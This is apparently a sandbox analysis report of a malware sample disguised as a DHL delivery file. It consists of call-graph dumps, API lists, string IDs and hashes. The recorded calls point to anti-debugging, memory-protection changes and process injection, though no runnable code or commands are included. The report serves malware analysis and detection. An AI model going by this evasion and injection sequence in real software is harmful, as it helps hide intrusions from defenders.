__vbaObjSet 65376->65377 65378 40f86e __vbaNew2 65376->65378 65380 40f8d1 65377->65380 65378->65377 65381 40f902 65380->65381 65382 40f8e2 __vbaHresultCheckObj 65380->65382 65383 40f912 __vbaNew2 65381->65383 65384 40f92d __vbaObjSet 65381->65384 65382->65381 65383->65384 65386 40f97b 65384->65386 65387 40f98c __vbaHresultCheckObj 65386->65387 65388 40f9af 65386->65388 65389 40f9b6 __vbaI4Var __vbaChkstk __vbaChkstk 65387->65389 65388->65389 65390 40faa1 __vbaFreeObjList __vbaFreeVarList 65389->65390 65391 40fb01 __vbaObjSet 65390->65391 65392 40fae6 __vbaNew2 65390->65392 65394 40fb4c 65391->65394 65392->65391 65395 40fb80 65394->65395 65396 40fb5d __vbaHresultCheckObj 65394->65396 65397 40fc14 65395->65397 65398 40fbf4 __vbaHresultCheckObj 65395->65398 65396->65395 65399 40fc1b __vbaFreeObj __vbaFreeVar 65397->65399 65398->65399 65400 40fc58 __vbaObjSet 65399->65400 65401 40fc3d __vbaNew2 65399->65401 65403 40fca3 65400->65403 65401->65400 65404 40fcb4 __vbaHresultCheckObj 65403->65404 65405 40fcd7 65403->65405 65406 40fcde __vbaLateIdCallLd 65404->65406 65405->65406 65407 40fd15 __vbaObjSet 65406->65407 65408 40fcfa __vbaNew2 65406->65408 65410 40fd63 65407->65410 65408->65407 65411 40fd74 __vbaHresultCheckObj 65410->65411 65412 40fd97 65410->65412 65411->65412 65413 40fdc2 __vbaObjSet 65412->65413 65414 40fda7 __vbaNew2 65412->65414 65416 40fe0d 65413->65416 65414->65413 65417 40fe3e 65416->65417 65418 40fe1e __vbaHresultCheckObj 65416->65418 65419 40fe45 __vbaStrCopy __vbaChkstk __vbaI4Var 65417->65419 65418->65419 65420 40feea __vbaFreeStr __vbaFreeObjList __vbaFreeVar 65419->65420 65421 40ff38 __vbaObjSet 65420->65421 65422 40ff1d __vbaNew2 65420->65422 65424 40ff83 65421->65424 65422->65421 65425 40ff94 __vbaHresultCheckObj 65424->65425 65426 40ffb7 65424->65426 65425->65426 65427 40ffe2 __vbaObjSet 65426->65427 65428 40ffc7 __vbaNew2 65426->65428 65430 41002d 65427->65430 65428->65427 65431 410061 65430->65431 65432 41003e __vbaHresultCheckObj 65430->65432 65433 410071 __vbaNew2 65431->65433 65434 41008c __vbaObjSet 65431->65434 65432->65431 65433->65434 65436 4100da 65434->65436 65437 4100eb __vbaHresultCheckObj 65436->65437 65438 41010e 65436->65438 65439 410115 __vbaStrCopy __vbaChkstk 65437->65439 65438->65439 65440 4101a1 65439->65440 65441 4101d0 65440->65441 65442 4101b0 __vbaHresultCheckObj 65440->65442 65443 4101d7 __vbaFreeStrList __vbaFreeObjList __vbaFreeVar 65441->65443 65442->65443 65444 410210 __vbaNew2 65443->65444 65445 41022b __vbaObjSet 65443->65445 65444->65445 65447 410276 65445->65447 65448 410287 __vbaHresultCheckObj 65447->65448 65449 4102aa 65447->65449 65448->65449 65450 4102d5 __vbaObjSet 65449->65450 65451 4102ba __vbaNew2 65449->65451 65453 410320 65450->65453 65451->65450 65454 410331 __vbaHresultCheckObj 65453->65454 65455 410354 65453->65455 65456 41035b __vbaLateIdCallLd 65454->65456 65455->65456 65457 410395 __vbaObjSet 65456->65457 65458 41037a __vbaNew2 65456->65458 65460 4103e0 65457->65460 65458->65457 65461 4103f1 __vbaHresultCheckObj 65460->65461 65462 410414 65460->65462 65461->65462 65463 410424 __vbaNew2 65462->65463 65464 41043f __vbaObjSet 65462->65464 65463->65464 65466 41048a 65464->65466 65467 41049b __vbaHresultCheckObj 65466->65467 65468 4104be 65466->65468 65469 4104c5 __vbaChkstk __vbaStrVarMove __vbaStrMove 65467->65469 65468->65469 65470 4105b7 __vbaFreeStr __vbaFreeObjList __vbaFreeVarList 65469->65470 65471 41060e 65470->65471 65472 41063f 65471->65472 65473 41061f __vbaHresultCheckObj 65471->65473 65474 410646 __vbaOnError 65472->65474 65473->65474 65475 41065e 65474->65475 65476 21a080f 65477 21a0827 EnumWindows 65476->65477 65479 21a0841 65477->65479 65484 21a0928 65477->65484 65478 21a83ac 51 API calls 65478->65484 65497 21a07ff 51 API calls 65479->65497 65481 21a0882 65482 21a9afd 51 API calls 65482->65484 65483 21a0aa6 NtSetInformationThread 65483->65484 65484->65478 65484->65482 65484->65483 65485 21a0b3c 65484->65485 65486 21a0bc7 65485->65486 65498 21a087d 51 API calls 65486->65498 65488 21a660d 65489 21a6673 65488->65489 65499 21a0712 51 API calls 65488->65499 65493 21a66aa 65489->65493 65500 21a07c6 51 API calls 65489->65500 65496 21a6712 65493->65496 65501 21a087d 51 API calls 65493->65501 65497->65481 65498->65488 65500->65493 65501->65496 65502 21ab283 65503 21ab29f 65502->65503 65504 21ab35c 65503->65504 65505 21ab2c9 NtResumeThread 65503->65505 65508 21a83ac 65503->65508 65505->65508 65506 21a84db LoadLibraryA 65507 21a84ec 65506->65507 65508->65506 65509 21a8b71 51 API calls 65508->65509 65511 21ab310 65508->65511 65510 21a841b 65509->65510 65512 21a8b71 51 API calls 65510->65512 65515 21a847d 65510->65515 65520 21a0928 65510->65520 65513 21a8441 65512->65513 65513->65515 65517 21a8b71 51 API calls 65513->65517 65514 21a83ac 51 API calls 65514->65520 65516 21a84da 65515->65516 65515->65520 65516->65506 65517->65515 65518 21a9afd 51 API calls 65518->65520 65519 21a0aa6 NtSetInformationThread 65519->65520 65520->65514 65520->65518 65520->65519 65521 21a0b3c 65520->65521 65522 21a0bc7 65521->65522 65533 21a087d 51 API calls 65522->65533 65524 21a660d 65525 21a6673 65524->65525 65534 21a0712 51 API calls 65524->65534 65530 21a66aa 65525->65530 65535 21a07c6 51 API calls 65525->65535 65532 21a6712 65530->65532 65536 21a087d 51 API calls 65530->65536 65533->65524 65535->65530 65536->65532 65537 21a0ef6 65552 21a0d1c 65537->65552 65539 21a0f8a 65544 21a83ac 65539->65544 65686 21a4cb8 GetPEB 65539->65686 65541 21a84db LoadLibraryA 65542 21a84ec 65541->65542 65543 21a0daf 65544->65541 65545 21a8b71 51 API calls 65544->65545 65546 21a841b 65545->65546 65550 21a8b71 51 API calls 65546->65550 65554 21a847d 65546->65554 65563 21a0928 65546->65563 65547 21a0fa4 65549 21a83ac 51 API calls 65547->65549 65548 21a9afd 51 API calls 65548->65563 65551 21a1012 65549->65551 65553 21a8441 65550->65553 65551->65544 65558 21aab16 51 API calls 65551->65558 65552->65543 65555 21a9726 65552->65555 65552->65563 65642 21a5d6c 65552->65642 65553->65554 65561 21a8b71 51 API calls 65553->65561 65557 21a84da 65554->65557 65554->65563 65559 21a8b71 51 API calls 65555->65559 65556 21a83ac 51 API calls 65556->65563 65557->65541 65565 21a1064 65558->65565 65562 21a9754 65559->65562 65560 21a0aa6 NtSetInformationThread 65560->65563 65561->65554 65747 21a087d 51 API calls 65562->65747 65563->65548 65563->65556 65563->65560 65572 21a0b3c 65563->65572 65568 21a83ac 51 API calls 65565->65568 65589 21a11d1 65565->65589 65566 21a83ac 51 API calls 65570 21a13da 65566->65570 65567 21a9791 65569 21a10d4 65568->65569 65571 21a087d 65569->65571 65573 21aab16 51 API calls 65569->65573 65570->65544 65575 21a83ac 51 API calls 65570->65575 65730 21a07ff 51 API calls 65571->65730 65615 21a0bc7 65572->65615 65573->65589 65577 21a1457 65575->65577 65576 21a0882 65579 21aab16 51 API calls 65577->65579 65580 21a14ee 65579->65580 65580->65555 65586 21a1504 65580->65586 65581 21a660d 65582 21a6673 65581->65582 65740 21a0712 51 API calls 65581->65740 65588 21a66aa 65582->65588 65741 21a07c6 51 API calls 65582->65741 65592 21a1538 65586->65592 65601 21a1682 65586->65601 65595 21a6712 65588->65595 65742 21a087d 51 API calls 65588->65742 65589->65555 65589->65566 65589->65572 65593 21a156f 65592->65593 65688 21a4020 65592->65688 65594 21a1642 TerminateProcess 65593->65594 65731 21a22eb 51 API calls 65593->65731 65598 21a4c87 65594->65598 65638 21a4020 65594->65638 65599 21a9afd 51 API calls 65599->65638 65600 21a1830 65602 21a1c03 65600->65602 65735 21a22eb 51 API calls 65600->65735 65601->65563 65601->65600 65603 21a1807 65601->65603 65733 21a22eb 51 API calls 65601->65733 65602->65544 65608 21a5468 65602->65608 65602->65638 65734 21a0928 51 API calls 65603->65734 65604 21a15ae 65604->65563 65604->65571 65732 21a20e2 51 API calls 65604->65732 65738 21a0928 51 API calls 65608->65738 65610 21a1800 65610->65600 65610->65603 65611 21a1864 65611->65602 65614 21a1872 65611->65614 65613 21a8334 GetPEB 65613->65638 65617 21a9afd 51 API calls 65614->65617 65616 21a54d4 65615->65616 65739 21a087d 51 API calls 65615->65739 65618 21a18ba 65617->65618 65736 21a1f3e 51 API calls 65618->65736 65620 21a18f3 65737 21a26ab 51 API calls 65620->65737 65621 21a83ac 51 API calls 65621->65638 65622 21aab16 51 API calls 65622->65638 65624 21a4a65 65626 21a68f6 65628 21a6974 65626->65628 65630 21a6917 65626->65630 65627 21a1962 65627->65626 65629 21a68af 65627->65629 65627->65630 65743 21a210e 51 API calls 65627->65743 65745 21a22fa 51 API calls 65628->65745 65629->65627 65630->65628 65744 21a259b 51 API calls 65630->65744 65633 21a69a4 65746 21a0928 51 API calls 65633->65746 65635 21a69e9 65636 21a4cf9 51 API calls 65636->65638 65637 21a4824 NtWriteVirtualMemory 65637->65638 65638->65544 65638->65571 65638->65572 65638->65599 65638->65613 65638->65621 65638->65622 65638->65624 65638->65636 65638->65637 65639 21a4938 65638->65639 65640 21aab16 51 API calls 65639->65640 65641 21a4985 65640->65641 65643 21a5d98 65642->65643 65644 21a5da0 65643->65644 65645 21a83ac 51 API calls 65643->65645 65646 21a83ac 51 API calls 65644->65646 65645->65644 65647 21a5dd0 65646->65647 65648 21a83ac 51 API calls 65647->65648 65649 21a5e1f 65648->65649 65650 21a83ac 51 API calls 65649->65650 65651 21a5e6d 65650->65651 65652 21a83ac 51 API calls 65651->65652 65653 21a5e88 65652->65653 65654 21a83ac 51 API calls 65653->65654 65655 21a5f1b 65654->65655 65656 21a83ac 51 API calls 65655->65656 65657 21a5f6b 65656->65657 65658 21a83ac 51 API calls 65657->65658 65659 21a5fa5 65658->65659 65660 21a83ac 51 API calls 65659->65660 65661 21a5fd8 65660->65661 65662 21a83ac 51 API calls 65661->65662 65663 21a602d 65662->65663 65664 21a83ac 51 API calls 65663->65664 65665 21a607a 65664->65665 65666 21a83ac 51 API calls 65665->65666 65667 21a60ce 65666->65667 65668 21a83ac 51 API calls 65667->65668 65669 21a6123 65668->65669 65670 21a83ac 51 API calls 65669->65670 65671 21a6163 65670->65671 65672 21a83ac 51 API calls 65671->65672 65673 21a61a7 65672->65673 65674 21a83ac 51 API calls 65673->65674 65675 21a61c5 65674->65675 65676 21a087d 65675->65676 65677 21a6204 65675->65677 65748 21a07ff 51 API calls 65676->65748 65679 21a83ac 51 API calls 65677->65679 65681 21a621d 65679->65681 65680 21a0882 65680->65539 65682 21a83ac 51 API calls 65681->65682 65683 21a6260 65682->65683 65684 21a83ac 51 API calls 65683->65684 65685 21a62a2 65684->65685 65685->65539 65687 21a4cf0 65686->65687 65687->65547 65703 21a403d 65688->65703 65689 21a9afd 48 API calls 65689->65703 65690 21a8334 GetPEB 65690->65703 65691 21a83ac 48 API calls 65691->65703 65692 21aab16 48 API calls 65692->65703 65693 21a84db LoadLibraryA 65694 21a84ec 65693->65694 65694->65592 65695 21a83ac 65695->65693 65696 21a8b71 48 API calls 65695->65696 65697 21a841b 65696->65697 65699 21a8b71 48 API calls 65697->65699 65701 21a847d 65697->65701 65717 21a0928 65697->65717 65698 21a4a65 65698->65592 65700 21a8441 65699->65700 65700->65701 65704 21a8b71 48 API calls 65700->65704 65702 21a84da 65701->65702 65701->65717 65702->65693 65703->65688 65703->65689 65703->65690 65703->65691 65703->65692 65703->65695 65703->65698 65705 21a0b3c 65703->65705 65722 21a087d 65703->65722 65725 21a4cf9 48 API calls 65703->65725 65726 21a4824 NtWriteVirtualMemory 65703->65726 65727 21a4938 65703->65727 65704->65701 65706 21a0bc7 65705->65706 65706->65592 65750 21a087d 51 API calls 65706->65750 65708 21a9afd 48 API calls 65708->65717 65709 21a660d 65710 21a6673 65709->65710 65711 21a6610 65709->65711 65719 21a66aa 65710->65719 65752 21a07c6 51 API calls 65710->65752 65751 21a0712 51 API calls 65711->65751 65715 21a83ac 48 API calls 65715->65717 65717->65705 65717->65708 65717->65715 65718 21a0aa6 NtSetInformationThread 65717->65718 65718->65717 65721 21a6712 65719->65721 65753 21a087d 51 API calls 65719->65753 65749 21a07ff 51 API calls 65722->65749 65724 21a0882 65724->65592 65725->65703 65726->65703 65728 21aab16 48 API calls 65727->65728 65729 21a4985 65728->65729 65729->65592 65730->65576 65731->65604 65732->65594 65733->65610 65734->65600 65735->65611 65736->65620 65737->65627 65738->65615 65739->65581 65741->65588 65742->65595 65743->65626 65744->65628 65745->65633 65746->65635 65747->65567 65748->65680 65749->65724 65750->65709 65752->65719 65753->65721 65754 21a64c5 65755 21a64e1 65754->65755 65801 21a5862 65755->65801 65757 21a64e8 65831 21a56e1 65757->65831 65759 21a6572 65760 21a6574 LdrInitializeThunk 65759->65760 65787 21a4020 65759->65787 65761 21a0bc7 65888 21a087d 51 API calls 65761->65888 65763 21a9afd 51 API calls 65763->65787 65764 21a660d 65765 21a6673 65764->65765 65889 21a0712 51 API calls 65764->65889 65771 21a66aa 65765->65771 65890 21a07c6 51 API calls 65765->65890 65770 21a8334 GetPEB 65770->65787 65774 21a6712 65771->65774 65891 21a087d 51 API calls 65771->65891 65773 21a83ac 51 API calls 65773->65787 65775 21aab16 51 API calls 65775->65787 65776 21a84db LoadLibraryA 65777 21a84ec 65776->65777 65778 21a83ac 65778->65776 65779 21a8b71 51 API calls 65778->65779 65780 21a841b 65779->65780 65782 21a8b71 51 API calls 65780->65782 65785 21a847d 65780->65785 65790 21a0928 65780->65790 65781 21a4a65 65783 21a8441 65782->65783 65783->65785 65788 21a8b71 51 API calls 65783->65788 65784 21a83ac 51 API calls 65784->65790 65786 21a84da 65785->65786 65785->65790 65786->65776 65787->65761 65787->65763 65787->65770 65787->65773 65787->65775 65787->65778 65787->65781 65789 21a0b3c 65787->65789 65793 21a087d 65787->65793 65796 21a4cf9 51 API calls 65787->65796 65797 21a4824 NtWriteVirtualMemory 65787->65797 65798 21a4938 65787->65798 65788->65785 65789->65761 65790->65784 65790->65789 65791 21a9afd 51 API calls 65790->65791 65792 21a0aa6 NtSetInformationThread 65790->65792 65791->65790 65792->65790 65887 21a07ff 51 API calls 65793->65887 65795 21a0882 65796->65787 65797->65787 65799 21aab16 51 API calls 65798->65799 65800 21a4985 65799->65800 65802 21a588b 65801->65802 65804 21a0bc7 65802->65804 65805 21a58fa 65802->65805 65819 21a0928 65802->65819 65803 21a83ac 50 API calls 65803->65819 65804->65757 65893 21a087d 51 API calls 65804->65893 65807 21aab16 50 API calls 65805->65807 65820 21a5979 65807->65820 65808 21a660d 65809 21a6673 65808->65809 65894 21a0712 51 API calls 65808->65894 65815 21a66aa 65809->65815 65895 21a07c6 51 API calls 65809->65895 65814 21a9afd 50 API calls 65814->65819 65818 21a6712 65815->65818 65896 21a087d 51 API calls 65815->65896 65817 21a0aa6 NtSetInformationThread 65817->65819 65819->65803 65819->65814 65819->65817 65822 21a0b3c 65819->65822 65820->65804 65821 21aab16 50 API calls 65820->65821 65823 21a087d 65820->65823 65824 21a5c5d 65820->65824 65821->65820 65822->65804 65892 21a07ff 51 API calls 65823->65892 65827 21aab16 50 API calls 65824->65827 65826 21a0882 65826->65757 65828 21a5c98 65827->65828 65829 21aab16 50 API calls 65828->65829 65830 21a5cdb 65829->65830 65830->65757 65832 21a83ac 47 API calls 65831->65832 65833 21a56ff 65832->65833 65834 21a83ac 47 API calls 65833->65834 65835 21a573f 65834->65835 65836 21a83ac 47 API calls 65835->65836 65837 21a577e 65836->65837 65838 21a83ac 47 API calls 65837->65838 65839 21a57bc 65838->65839 65840 21a83ac 47 API calls 65839->65840 65844 21a57fc 65840->65844 65841 21a087d 65897 21a07ff 51 API calls 65841->65897 65843 21a0882 65843->65759 65844->65841 65845 21a5862 47 API calls 65844->65845 65846 21a64e8 65845->65846 65847 21a56e1 47 API calls 65846->65847 65848 21a6572 65847->65848 65849 21a6574 LdrInitializeThunk 65848->65849 65882 21a4020 65848->65882 65849->65759 65851 21a9afd 47 API calls 65851->65882 65852 21a660d 65853 21a6673 65852->65853 65899 21a0712 51 API calls 65852->65899 65859 21a66aa 65853->65859 65900 21a07c6 51 API calls 65853->65900 65858 21a8334 GetPEB 65858->65882 65862 21a6712 65859->65862 65901 21a087d 51 API calls 65859->65901 65861 21a83ac 47 API calls 65861->65882 65863 21a84db LoadLibraryA 65864 21a84ec 65863->65864 65864->65759 65865 21a83ac 65865->65863 65866 21a8b71 47 API calls 65865->65866 65867 21a841b 65866->65867 65869 21a8b71 47 API calls 65867->65869 65872 21a847d 65867->65872 65878 21a0928 65867->65878 65868 21a4a65 65868->65759 65870 21a8441 65869->65870 65870->65872 65874 21a8b71 47 API calls 65870->65874 65871 21a83ac 47 API calls 65871->65878 65873 21a84da 65872->65873 65872->65878 65873->65863 65874->65872 65875 21a0b3c 65879 21a0bc7 65875->65879 65876 21a9afd 47 API calls 65876->65878 65877 21a0aa6 NtSetInformationThread 65877->65878 65878->65871 65878->65875 65878->65876 65878->65877 65879->65759 65898 21a087d 51 API calls 65879->65898 65880 21a4cf9 47 API calls 65880->65882 65881 21a4824 NtWriteVirtualMemory 65881->65882 65882->65841 65882->65851 65882->65858 65882->65861 65882->65865 65882->65868 65882->65875 65882->65879 65882->65880 65882->65881 65883 21aab16 47 API calls 65882->65883 65884 21a4938 65882->65884 65883->65882 65885 21aab16 47 API calls 65884->65885 65886 21a4985 65885->65886 65886->65759 65887->65795 65888->65764 65890->65771 65891->65774 65892->65826 65893->65808 65895->65815 65896->65818 65897->65843 65898->65852 65900->65859 65901->65862

                        Executed Functions

                        Function 021A0C05, Relevance: 19.1, APIs: 4, Strings: 6, Instructions: 1649nativethreadUNIQUE
                        Download Yara Rule
                        APIs
                          • Part of subcall function 021A83AC: LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,?,00000000,00000000,5FBFF0FB,6DDB9555,?,?,00000087,00000040,021A0A1C), ref: 021A0ABB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationLibraryLoadThread
                        • String ID: W.E$1.!T$4l?R$4l?R$ntdll$F8
                        • API String ID: 543350213-1431527072
                        • Opcode ID: 1ab7c80bd8f054495e80a9b2f2b2c7e2b1e8353bfa0c1b5d5fb5961421367e81
                        • Instruction ID: 30d62e06631f35278c0fcd50218e6231353892eee021bde8d1131c3376a33e83
                        • Opcode Fuzzy Hash: 1ab7c80bd8f054495e80a9b2f2b2c7e2b1e8353bfa0c1b5d5fb5961421367e81
                        • Instruction Fuzzy Hash: A5A22F7CBC4346AEEF216D748DB57E62367AF127A0FD9412ADC86871C1D376C48AC602
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021A9AFD, Relevance: 14.8, APIs: 2, Strings: 6, Instructions: 810nativethreadUNIQUE
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 605 21a9afd-21a9ca0 call 21a83ac * 2 call 21a4d72 GetPEB call 21aa407 620 21aa0da-21aa0dc 605->620 621 21a9ca6-21a9d4e 605->621 625 21a087d-21a0901 call 21a07ff 621->625 626 21a9d54-21a9db3 621->626 631 21a9db9-21a9e3b 626->631 632 21a83ac-21a83e1 626->632 641 21a9e3f-21a9e47 631->641 638 21a84db-21a84e7 LoadLibraryA call 21a854d 632->638 639 21a83e7-21a8420 call 21a8b71 632->639 643 21a84ec-21a851c 638->643 651 21a8422-21a842e 639->651 652 21a8490-21a84d4 call 21a854d 639->652 644 21a9e4d-21a9e70 641->644 645 21aa0e1-21aa122 641->645 644->641 654 21a9e72-21a9e78 644->654 653 21aa126-21aa14d 645->653 656 21a0928-21a0940 651->656 657 21a8434-21a8449 call 21a8b71 651->657 652->656 678 21a84da 652->678 662 21aa293-21aa2c5 653->662 663 21aa153-21aa159 653->663 654->641 655 21a9e7a-21a9e81 654->655 655->641 660 21a9e83-21a9ea6 655->660 656->656 664 21a0942-21a0991 call 21a83ac call 21a4d72 656->664 657->652 674 21a844b-21a8487 call 21a8b71 657->674 672 21a4cf9-21a4d1f 660->672 673 21a9eac-21a9eed 660->673 677 21aa2c9-21aa2cf 662->677 663->653 668 21aa15b-21aa161 663->668 664->656 708 21a0993-21a09cc 664->708 668->653 675 21aa163-21aa18c 668->675 689 21a4d20-21a4d5c 672->689 686 21a9eef-21a9eff 673->686 674->656 703 21a848d-21a848e 674->703 675->653 690 21aa18e-21aa1ae 675->690 684 21aa3a1-21aa3cf call 21aa407 677->684 685 21aa2d5-21aa2fb 677->685 678->638 685->677 700 21aa2fd-21aa304 685->700 693 21a9f6f-21a9f77 686->693 694 21a9f01-21a9f39 686->694 706 21a4d5e-21a4d67 689->706 690->632 698 21aa1b4-21aa1d8 690->698 704 21a9f79-21a9fa1 693->704 705 21a9fa2-21a9fa7 693->705 694->656 710 21a9f3f-21a9f4a 694->710 713 21aa1da-21aa1e0 698->713 700->677 709 21aa306-21aa310 700->709 703->652 704->705 714 21aa04c-21aa054 705->714 715 21a9fad-21a9fb4 705->715 712 21a6608-21a660e call 21a0c05 706->712 708->656 724 21a09d2-21a0a3c call 21a9afd 708->724 709->677 717 21aa312-21aa35f 709->717 710->705 739 21a6679-21a66ac call 21a07c6 712->739 740 21a6610-21a6677 call 21a0712 call 21a634e 712->740 721 21aa1e2-21aa1ea 713->721 722 21aa254-21aa25a 713->722 719 21aa09b-21aa0a1 714->719 720 21aa056-21aa05f 714->720 715->714 723 21a9fba-21a9feb 715->723 737 21aa361-21aa367 717->737 719->686 729 21aa0a7-21aa0d4 call 21aa407 719->729 720->719 728 21aa061-21aa098 720->728 730 21aa1ec-21aa210 721->730 731 21aa215-21aa227 721->731 722->713 732 21aa260-21aa28b call 21aa407 722->732 735 21a9fed-21a9ff4 723->735 724->656 756 21a0a42-21a0b36 call 21a83ac NtSetInformationThread call 21a5250 call 21a83ac 724->756 728->719 729->620 738 21aa246-21aa253 730->738 753 21aa212 730->753 731->722 731->738 735->735 746 21a9ff6-21aa01b 735->746 748 21aa399-21aa39f 737->748 749 21aa369-21aa398 737->749 738->722 769 21a66af-21a66e1 call 21a0536 739->769 770 21a66e2 739->770 740->739 740->770 746->735 762 21aa01d-21aa023 746->762 748->684 748->737 749->748 753->731 756->656 798 21a0b3c 756->798 762->735 767 21aa025-21aa04a 762->767 767->714 769->770 776 21a6748-21a6760 770->776 777 21a66e4-21a6745 call 21a4ac4 770->777 780 21a6763-21a67d0 call 21a55cd call 21a4c0a 776->780 777->780 800 21a0b3d-21a0bb8 call 21a8844 798->800 804 21a0bbd-21a0bc1 800->804 804->800 805 21a0bc7-21a0bfa 804->805 805->712
                        APIs
                          • Part of subcall function 021A83AC: LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                          • Part of subcall function 021AA407: NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,021A9C94,00000040,021A0A1C,00000000,00000000,00000000,00000000,?,00000000,00000000,021A841B), ref: 021AA423
                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,?,00000000,00000000,5FBFF0FB,6DDB9555,?,?,00000087,00000040,021A0A1C), ref: 021A0ABB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationLibraryLoadMemoryProtectThreadVirtual
                        • String ID: "Bp0$"Bp0$1.!T$GT`$nTAz$ntdll
                        • API String ID: 449006233-3043025367
                        • Opcode ID: 084e60d350767497deb26374e19bbf8d0b91c14f689888e5504926c4e912f5a3
                        • Instruction ID: 70a2ff4d6a016e9e447287f22e95528a8650fc327622c99f401ebfbfd3e7c568
                        • Opcode Fuzzy Hash: 084e60d350767497deb26374e19bbf8d0b91c14f689888e5504926c4e912f5a3
                        • Instruction Fuzzy Hash: CB32AC6CBC43429EDF259E7489B43E677A39F17360F99826ECC928B1C6D325C486C613
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021A93E2, Relevance: 9.8, APIs: 3, Strings: 2, Instructions: 1076UNIQUE
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 807 21a93e2-21a94d3 call 21a83ac 814 21a94d5-21a94e7 807->814 815 21a98c9-21a98cf 814->815 816 21a94ed-21a9557 814->816 820 21a9559-21a955f 816->820 821 21a95c4-21a95d4 816->821 820->821 822 21a9561-21a9567 820->822 823 21a95d6-21a95db 821->823 822->821 824 21a9569-21a9591 822->824 823->814 825 21a95e1-21a95ef 823->825 824->821 828 21a9593-21a959a 824->828 825->823 827 21a95f1-21a961f 825->827 831 21a9621-21a9626 827->831 828->821 830 21a959c-21a95a1 828->830 830->814 831->814 832 21a962c-21a964d 831->832 832->831 834 21a964f-21a96cd call 21a8714 832->834 839 21a96d3-21a96dd 834->839 840 21a4020-21a4175 call 21a9afd call 21a8334 call 21aab16 834->840 842 21a0928-21a0940 839->842 843 21a96e3-21a96ea 839->843 878 21a417b-21a4218 call 21a83ac call 21aab16 840->878 879 21a498f-21a4a5f call 21aab16 * 3 840->879 842->842 845 21a0942-21a0991 call 21a83ac call 21a4d72 842->845 846 21a96ec-21a96f9 843->846 845->842 864 21a0993-21a09cc 845->864 846->831 849 21a96ff-21a971e 846->849 849->846 855 21a9720-21a9791 call 21a8b71 call 21a9793 849->855 864->842 870 21a09d2-21a0a3c call 21a9afd 864->870 870->842 880 21a0a42-21a0b36 call 21a83ac NtSetInformationThread call 21a5250 call 21a83ac 870->880 898 21a421e-21a4388 call 21a4a9b call 21a80e6 878->898 899 21a83ac-21a83e1 878->899 879->840 923 21a4a65-21a4a91 879->923 880->842 924 21a0b3c 880->924 948 21a4cf9-21a4d1f 898->948 949 21a438e-21a4454 call 21aab16 898->949 908 21a84db-21a851c LoadLibraryA call 21a854d 899->908 909 21a83e7-21a8420 call 21a8b71 899->909 925 21a8422-21a842e 909->925 926 21a8490-21a84d4 call 21a854d 909->926 929 21a0b3d-21a0bc1 call 21a8844 924->929 925->842 930 21a8434-21a8449 call 21a8b71 925->930 926->842 945 21a84da 926->945 946 21a0bc7-21a0bfa 929->946 930->926 943 21a844b-21a8487 call 21a8b71 930->943 943->842 959 21a848d-21a848e 943->959 945->908 954 21a6608-21a660e call 21a0c05 946->954 956 21a4d20-21a4d5c 948->956 949->879 970 21a445a-21a44f1 call 21aab16 949->970 965 21a6679-21a66ac call 21a07c6 954->965 966 21a6610-21a6677 call 21a0712 call 21a634e 954->966 963 21a4d5e-21a4d67 956->963 959->926 963->954 980 21a66af-21a66e1 call 21a0536 965->980 981 21a66e2 965->981 966->965 966->981 970->879 985 21a44f7-21a45db call 21aab16 970->985 980->981 986 21a6748-21a6760 981->986 987 21a66e4-21a6745 call 21a4ac4 981->987 985->879 1006 21a45e1-21a460b 985->1006 990 21a6763-21a67d0 call 21a55cd call 21a4c0a 986->990 987->990 1006->879 1010 21a4611-21a461c 1006->1010 1011 21a4649-21a4656 1010->1011 1012 21a461e-21a4623 1010->1012 1011->879 1013 21a465c-21a46bb 1011->1013 1012->879 1014 21a4629-21a4647 1012->1014 1018 21a087d-21a0901 call 21a07ff 1013->1018 1019 21a46c1-21a4754 call 21a8844 1013->1019 1014->1011 1019->879 1029 21a475a-21a47e4 call 21a4cf9 1019->1029 1029->1018 1034 21a47ea-21a482f NtWriteVirtualMemory 1029->1034 1034->879 1036 21a4835-21a48b4 call 21aab16 1034->1036 1036->879 1041 21a48ba-21a4936 call 21aab16 1036->1041 1041->879 1046 21a4938-21a498a call 21aab16 1041->1046
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID: 1.!T$ntdll
                        • API String ID: 1029625771-1346282702
                        • Opcode ID: fb72fee9565bcae30420d2c452b95b68a1b2054da5f2e66320e9a9dc29f7541a
                        • Instruction ID: de70dbac0a546b652c0c6de74447cd7670a757c495a42a15d0f354fa140c3d3b
                        • Opcode Fuzzy Hash: fb72fee9565bcae30420d2c452b95b68a1b2054da5f2e66320e9a9dc29f7541a
                        • Instruction Fuzzy Hash: 1562CE7C7C1306AEFF252D688DB17E633A7AF12390FD54129EC86871C5D7A684CAC642
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021AAB3F, Relevance: 9.3, APIs: 3, Strings: 2, Instructions: 589librarynativethreadUNIQUE
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
